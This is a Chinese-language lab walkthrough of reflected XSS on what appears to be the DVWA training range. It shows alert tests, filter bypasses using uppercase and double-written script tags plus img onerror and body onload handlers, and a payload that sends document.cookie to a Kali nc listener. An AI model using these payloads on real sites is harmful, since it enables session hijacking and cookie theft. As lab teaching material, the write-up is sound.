首先输入最基础的
<script>alert(“1”)script>
发现弹窗成功.
重置数据库,试一下能不能爆出cookie。
<script>alert(“document.cookie”)script>
之后使用burp看一下数据包
发现其中的Cookie与爆出来的相同,证明爆出来的确实是Cookie
开个kali的nc监听一下
之后在靶场输入
<script>new Image().src="http://192.168.92.128/a.php?cookie="+document.cookie;script>
执行后可以在kali处看到返回的cookie
首先试一下最基本的alert1:
毫无反应,甚至alert(“1”)作为用户名打了出来
点击网页右下角View Source按钮查看源码。
这里可以发现安全策略为:
将输入中的script(nnd,这里被安全屏蔽了,左右括号打不出来)替换为空,那么针对这个安全策略,可以有以下几种方法:
1 大写绕过
<SCRIPT>alert(“1”)script>
2 双写绕过
<script>ipt>alert(“1”)script>
3 使用其他标签
<img src=1 onerror=alert(document.cookie)>
这句是向src所记录的路由申请资源,若出错则执行onerror
此处我还实验了’<’和’>’符号的转义,遗憾的是没有成功
打开源码,可以看到源码对script使用正则进行了严格限制,medium阶段所使用的大写与双写绕过均作废了。只好使用其他标签进行漏洞利用
<body onload=alert(“1”)>
看眼源码,将输入进行了html实体转义,甚至防住了CSRF攻击。